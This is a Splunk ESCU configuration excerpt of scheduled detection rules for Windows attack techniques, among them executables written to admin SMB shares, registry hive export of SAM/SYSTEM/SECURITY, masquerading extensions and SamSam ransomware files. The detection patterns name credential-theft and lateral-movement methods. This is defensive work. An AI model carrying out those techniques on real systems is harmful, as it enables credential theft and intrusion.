action.risk.param._risk_message = $src_user$ dropped or created an executable file in a known sensitive SMB share. Share name=$ShareName$, Target name=$RelativeTargetName$, and Access mask=$AccessMask$
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 70}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Executable File Written in Administrative SMB Share - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Prestige Ransomware", "Graceful Wipe Out Attack", "Industroyer2", "IcedID", "Data Destruction", "Hermetic Wiper", "Trickbot"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). This represents suspicious behavior as it is commonly used by tools like PsExec/PaExec and others to stage service binaries before creating and starting a Windows service on remote endpoints. Red Teams and adversaries alike may abuse administrative shares for lateral movement and remote code execution. The Trickbot malware family also implements this behavior to try to infect other machines in the infected network.
action.notable.param.rule_title = Executable File Written in Administrative SMB Share
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=5145 RelativeTargetName IN ("*.exe","*.dll") ObjectType=File ShareName IN ("\\\\*\\C$","\\\\*\\IPC$","\\\\*\\admin$") AccessMask= "0x2" | stats min(_time) as firstTime max(_time) as lastTime count by EventCode ShareName RelativeTargetName ObjectType AccessMask src_user src_port IpAddress | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `executable_file_written_in_administrative_smb_share_filter`

[ESCU - Executables Or Script Creation In Suspicious Path - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies potentially malicious executables or scripts by examining a list of suspicious file paths on the Windows operating system. The purpose of this technique is to uncover files with known file extensions that could be used by adversaries to evade detection and maintain persistence. The suspicious file paths selected for investigation are typically uncommon and rarely associated with executable or script files. By scrutinizing these paths, we can proactively identify potential security threats and enhance overall system security.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic identifies potentially malicious executables or scripts by examining a list of suspicious file paths on the Windows operating system. The purpose of this technique is to uncover files with known file extensions that could be used by adversaries to evade detection and maintain persistence. The suspicious file paths selected for investigation are typically uncommon and rarely associated with executable or script files. By scrutinizing these paths, we can proactively identify potential security threats and enhance overall system security.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting file system events that include the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Filesystem` node.
action.escu.known_false_positives = Administrators may allow creation of scripts or executables in the paths specified. Filter as needed.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Executables Or Script Creation In Suspicious Path - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Snake Keylogger"]
action.risk = 1
action.risk.param._risk_message = Suspicious executable or script with file name $file_name$, $file_path$ and process_id $process_id$ executed from a suspicious file path in Windows by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Executables Or Script Creation In Suspicious Path - Rule
action.correlationsearch.annotations = {"analytic_story": ["Double Zero Destructor", "Graceful Wipe Out Attack", "AsyncRAT", "WhisperGate", "DarkGate Malware", "AgentTesla", "Brute Ratel C4", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "Swift Slicer", "IcedID", "DarkCrystal RAT", "Chaos Ransomware", "PlugX", "Industroyer2", "Azorult", "Remcos", "XMRig", "Qakbot", "Volt Typhoon", "Hermetic Wiper", "Warzone RAT", "Trickbot", "Amadey", "BlackByte Ransomware", "LockBit Ransomware", "CISA AA23-347A", "Data Destruction", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = |tstats `security_content_summariesonly` values(Filesystem.file_path) as file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name = *.exe OR Filesystem.file_name = *.dll OR Filesystem.file_name = *.sys OR Filesystem.file_name = *.com OR Filesystem.file_name = *.vbs OR Filesystem.file_name = *.vbe OR Filesystem.file_name = *.js OR Filesystem.file_name = *.ps1 OR Filesystem.file_name = *.bat OR Filesystem.file_name = *.cmd OR Filesystem.file_name = *.pif) AND ( Filesystem.file_path = *\\windows\\fonts\\* OR Filesystem.file_path = *\\windows\\temp\\* OR Filesystem.file_path = *\\users\\public\\* OR Filesystem.file_path = *\\windows\\debug\\* OR Filesystem.file_path = *\\Users\\Administrator\\Music\\* OR Filesystem.file_path = *\\Windows\\servicing\\* OR Filesystem.file_path = *\\Users\\Default\\* OR Filesystem.file_path = *Recycle.bin* OR Filesystem.file_path = *\\Windows\\Media\\* OR Filesystem.file_path = *\\Windows\\repair\\* OR Filesystem.file_path = *\\AppData\\Local\\Temp* OR Filesystem.file_path = *\\PerfLogs\\*) by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `executables_or_script_creation_in_suspicious_path_filter`

[ESCU - Execute Javascript With Jscript COM CLSID - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies a suspicious cscript.exe process that tries to execute JavaScript using the JScript.Encode CLSID (COM object). This technique was seen in ransomware (RedDot ransomware), which executed JavaScript through this COM object in combination with an AMSI-disabling technique.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic identifies a suspicious cscript.exe process that tries to execute JavaScript using the JScript.Encode CLSID (COM object). This technique was seen in ransomware (RedDot ransomware), which executed JavaScript through this COM object in combination with an AMSI-disabling technique.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-06-22
action.escu.modification_date = 2021-06-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Execute Javascript With Jscript COM CLSID - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware"]
action.risk = 1
action.risk.param._risk_message = Suspicious cscript.exe process with parent process $parent_process_name$ trying to execute JavaScript using the JScript.Encode CLSID (COM object), detected on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Execute Javascript With Jscript COM CLSID - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies a suspicious cscript.exe process that tries to execute JavaScript using the JScript.Encode CLSID (COM object). This technique was seen in ransomware (RedDot ransomware), which executed JavaScript through this COM object in combination with an AMSI-disabling technique.
action.notable.param.rule_title = Execute Javascript With Jscript COM CLSID action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cscript.exe" Processes.process="*-e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}*" by Processes.parent_process_name Processes.process_name Processes.process Processes.parent_process Processes.process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `execute_javascript_with_jscript_com_clsid_filter` [ESCU - Execution of File with Multiple Extensions - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. action.escu.creation_date = 2020-11-18 action.escu.modification_date = 2020-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Execution of File with Multiple Extensions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities", "AsyncRAT", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = process $process$ have double extensions in the file name is executed on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Execution of File with Multiple Extensions - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows File Extension and Association Abuse", "Masquerading - Rename System Utilities", 
"AsyncRAT", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036", "T1036.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content. action.notable.param.rule_title = Execution of File with Multiple Extensions action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*.doc.exe", "*.xls.exe","*.ppt.exe", "*.htm.exe", "*.html.exe", "*.txt.exe", "*.pdf.exe", "*.docx.exe", "*.xlsx.exe", "*.pptx.exe","*.one.exe", "*.bat.exe", "*rtf.exe") by Processes.dest Processes.user Processes.process Processes.process_name Processes.parent_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_multiple_extensions_filter` [ESCU - Extraction of Registry Hives - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of `reg.exe` exporting Windows Registry hives containing credentials. Adversaries may use this technique to export registry hives for offline credential access attacks. Typically found executed from a untrusted process or script. Upon execution, a file will be written to disk. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of `reg.exe` exporting Windows Registry hives containing credentials. Adversaries may use this technique to export registry hives for offline credential access attacks. Typically found executed from a untrusted process or script. Upon execution, a file will be written to disk. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is possible some agent based products will generate false positives. Filter as needed. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Extraction of Registry Hives - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Volt Typhoon", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = Suspicious use of `reg.exe` exporting Windows Registry hives containing credentials executed on $dest$ by user $user$, with a parent process of $parent_process_id$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Extraction of Registry Hives - Rule action.correlationsearch.annotations = {"analytic_story": ["Volt Typhoon", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of `reg.exe` exporting Windows Registry hives containing credentials. Adversaries may use this technique to export registry hives for offline credential access attacks. 
Typically found executed from a untrusted process or script. Upon execution, a file will be written to disk. action.notable.param.rule_title = Extraction of Registry Hives action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_reg` (Processes.process=*save* OR Processes.process=*export*) AND (Processes.process="*\sam *" OR Processes.process="*\system *" OR Processes.process="*\security *") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `extraction_of_registry_hives_filter` [ESCU - File with Samsam Extension - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects file writes with extensions that are consistent with a SamSam ransomware attack to proactively detect and respond to potential SamSam ransomware attacks, minimizing the impact and reducing the likelihood of successful ransomware infections. This detection is made by a Splunk query to search for specific file extensions that are commonly associated with SamSam ransomware, such as .stubbin, .berkshire, .satoshi, .sophos, and .keyxml. This identifies file extensions in the file names of the written files. If any file write events with these extensions are found, it suggests a potential SamSam ransomware attack. 
This detection is important because SamSam ransomware is a highly destructive and financially motivated attack and suggests that the organization is at risk of having its files encrypted and held for ransom, which can lead to significant financial losses, operational disruptions, and reputational damage. False positives might occur since legitimate files with these extensions can exist in the environment. Therefore, next steps include conducting a careful analysis and triage to confirm the presence of a SamSam ransomware attack. Next steps include taking immediate action to contain the attack, mitigate the impact, and prevent further spread of the ransomware. This might involve isolating affected systems, restoring encrypted files from backups, and conducting a thorough investigation to identify the attack source and prevent future incidents. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects file writes with extensions that are consistent with a SamSam ransomware attack to proactively detect and respond to potential SamSam ransomware attacks, minimizing the impact and reducing the likelihood of successful ransomware infections. This detection is made by a Splunk query to search for specific file extensions that are commonly associated with SamSam ransomware, such as .stubbin, .berkshire, .satoshi, .sophos, and .keyxml. This identifies file extensions in the file names of the written files. If any file write events with these extensions are found, it suggests a potential SamSam ransomware attack. This detection is important because SamSam ransomware is a highly destructive and financially motivated attack and suggests that the organization is at risk of having its files encrypted and held for ransom, which can lead to significant financial losses, operational disruptions, and reputational damage. 
False positives might occur since legitimate files with these extensions can exist in the environment. Therefore, next steps include conducting a careful analysis and triage to confirm the presence of a SamSam ransomware attack. Next steps include taking immediate action to contain the attack, mitigate the impact, and prevent further spread of the ransomware. This might involve isolating affected systems, restoring encrypted files from backups, and conducting a thorough investigation to identify the attack source and prevent future incidents. action.escu.how_to_implement = You must be ingesting data that records file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = Because these extensions are not typically used in normal operations, you should investigate all results. action.escu.creation_date = 2018-12-14 action.escu.modification_date = 2018-12-14 action.escu.confidence = high action.escu.full_search_name = ESCU - File with Samsam Extension - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware"] action.risk = 1 action.risk.param._risk_message = File writes $file_name$ with extensions consistent with a SamSam ransomware attack seen on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * 
dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - File with Samsam Extension - Rule action.correlationsearch.annotations = {"analytic_story": ["SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects file writes with extensions that are consistent with a SamSam ransomware attack to proactively detect and respond to potential SamSam ransomware attacks, minimizing the impact and reducing the likelihood of successful ransomware infections. This detection is made by a Splunk query to search for specific file extensions that are commonly associated with SamSam ransomware, such as .stubbin, .berkshire, .satoshi, .sophos, and .keyxml. This identifies file extensions in the file names of the written files. If any file write events with these extensions are found, it suggests a potential SamSam ransomware attack. This detection is important because SamSam ransomware is a highly destructive and financially motivated attack and suggests that the organization is at risk of having its files encrypted and held for ransom, which can lead to significant financial losses, operational disruptions, and reputational damage. False positives might occur since legitimate files with these extensions can exist in the environment. Therefore, next steps include conducting a careful analysis and triage to confirm the presence of a SamSam ransomware attack. Next steps include taking immediate action to contain the attack, mitigate the impact, and prevent further spread of the ransomware. This might involve isolating affected systems, restoring encrypted files from backups, and conducting a thorough investigation to identify the attack source and prevent future incidents. 
action.notable.param.rule_title = File with Samsam Extension action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)`| rex field=file_name "(?\.[^\.]+)$" | search file_extension=.stubbin OR file_extension=.berkshire OR file_extension=.satoshi OR file_extension=.sophos OR file_extension=.keyxml | `file_with_samsam_extension_filter` [ESCU - Firewall Allowed Program Enable - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a potential suspicious modification of firewall rule allowing to execute specific application. This technique was identified when an adversary and red teams to bypassed firewall file execution restriction in a targetted host. Take note that this event or command can run by administrator during testing or allowing legitimate tool or application. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a potential suspicious modification of firewall rule allowing to execute specific application. This technique was identified when an adversary and red teams to bypassed firewall file execution restriction in a targetted host. Take note that this event or command can run by administrator during testing or allowing legitimate tool or application. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated or manual execution of this firewall rule that may generate false positives. Filter as needed. action.escu.creation_date = 2021-11-12 action.escu.modification_date = 2021-11-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Firewall Allowed Program Enable - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Azorult", "BlackByte Ransomware", "NjRAT", "PlugX"] action.risk = 1 action.risk.param._risk_message = firewall allowed program commandline $process$ of $process_name$ on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Firewall Allowed 
Program Enable - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Azorult", "BlackByte Ransomware", "NjRAT", "PlugX"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = "*firewall*" Processes.process = "*allow*" Processes.process = "*add*" Processes.process = "*ENABLE*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `firewall_allowed_program_enable_filter` [ESCU - First Time Seen Child Process of Zoom - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for child processes spawned by zoom.exe or zoom.us that has not previously been seen. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for child processes spawned by zoom.exe or zoom.us that has not previously been seen. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A new child process of zoom isn't malicious by that fact alone. Further investigation of the actions of the child process is needed to verify any malicious behavior is taken. action.escu.creation_date = 2020-05-20 action.escu.modification_date = 2020-05-20 action.escu.confidence = high action.escu.full_search_name = ESCU - First Time Seen Child Process of Zoom - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Zoom Child Processes"] action.risk = 1 action.risk.param._risk_message = Child process $process_name$ with $process_id$ spawned by zoom.exe or zoom.us which has not been previously on host $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * 
dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - First Time Seen Child Process of Zoom - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Zoom Child Processes"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime values(Processes.parent_process_name) as parent_process_name values(Processes.parent_process_id) as parent_process_id values(Processes.process_name) as process_name values(Processes.process) as process from datamodel=Endpoint.Processes where (Processes.parent_process_name=zoom.exe OR Processes.parent_process_name=zoom.us) by Processes.process_id Processes.dest | `drop_dm_object_name(Processes)` | lookup zoom_first_time_child_process dest as dest process_name as process_name OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), "`previously_seen_zoom_child_processes_window`") | `security_content_ctime(firstTime)` | table firstTime dest, process_id, process_name, parent_process_id, parent_process_name |`first_time_seen_child_process_of_zoom_filter` [ESCU - First Time Seen Running Windows Service - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. 
